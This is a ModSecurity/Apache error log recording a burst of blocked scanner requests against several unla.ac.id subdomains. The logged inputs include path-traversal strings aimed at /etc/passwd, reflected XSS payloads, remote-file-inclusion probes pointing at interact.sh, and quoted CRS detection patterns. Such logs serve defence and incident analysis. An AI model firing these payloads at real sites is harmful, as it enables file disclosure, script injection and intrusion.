[Tue Aug 29 11:52:43.596252 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15m8Co-f0AAAoO52gAAAAK"]
[Tue Aug 29 11:52:43.672230 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15m8Co-f0AAAoLfJ4AAAAG"]
[Tue Aug 29 11:52:44.540960 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15nMCo-f0AAAnTlUIAAAAA"]
[Tue Aug 29 11:52:44.541350 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15nMCo-f0AAAoVqoQAAAAH"]
[Tue Aug 29 11:52:44.543914 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15nMCo-f0AAAlUlvoAAAA0"]
[Tue Aug 29 11:52:44.550266 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15nMCo-f0AAAoO520AAAAK"]
[Tue Aug 29 11:52:45.145057 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15ncCo-f0AAAnd3LcAAAAI"]
[Tue Aug 29 11:52:45.533485 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAoQ3McAAAAN"]
[Tue Aug 29 11:52:45.539546 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 0<script found within ARGS:version: 7.5.0<script>confirm(2Ue0HkQR8I3XhDLhgGNgSJ5LNGO)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/rewe/prod/web/rewe_go_check.php"] [unique_id "ZO15ncCo-f0AAAnjjT8AAAAX"]
[Tue Aug 29 11:52:45.540202 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAnHQngAAAAT"]
[Tue Aug 29 11:52:45.572012 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAnjjUAAAAAX"]
[Tue Aug 29 11:52:45.576051 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15ncCo-f0AAAoPuYQAAAAM"]
[Tue Aug 29 11:52:45.593747 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15ncCo-f0AAAoGFasAAAAE"]
[Tue Aug 29 11:52:45.599518 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAoO53YAAAAK"]
[Tue Aug 29 11:52:45.619476 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15ncCo-f0AAAoO53cAAAAK"]
[Tue Aug 29 11:52:46.608506 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:extra. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../ found within ARGS:extra: /../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/mj_wwwusr"] [unique_id "ZO15nsCo-f0AAAoO53sAAAAK"]
[Tue Aug 29 11:52:46.661875 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15nsCo-f0AAAnHQoAAAAAT"]
[Tue Aug 29 11:52:46.717022 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15nsCo-f0AAAoVqooAAAAH"]
[Tue Aug 29 11:52:46.725408 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15nsCo-f0AAAoLfKkAAAAG"]
[Tue Aug 29 11:52:46.795307 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15nsCo-f0AAAoQ3M8AAAAN"]
[Tue Aug 29 11:52:46.840377 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/openwin.php"] [unique_id "ZO15nsCo-f0AAAoQ3NAAAAAN"]
[Tue Aug 29 11:52:46.877479 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15nsCo-f0AAAnjjUoAAAAX"]
[Tue Aug 29 11:52:46.878753 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15nsCo-f0AAAmQ-28AAAAb"]
[Tue Aug 29 11:52:46.879817 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15nsCo-f0AAAnHQoMAAAAT"]
[Tue Aug 29 11:52:46.879924 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:redirect_to: /asdf\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/demo/api/logout"] [unique_id "ZO15nsCo-f0AAAoGFbAAAAAE"]
[Tue Aug 29 11:52:47.636651 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAoW7I0AAAAJ"]
[Tue Aug 29 11:52:47.641626 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAoGFbIAAAAE"]
[Tue Aug 29 11:52:47.664158 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/user/login/"] [unique_id "ZO15n8Co-f0AAAoO54IAAAAK"]
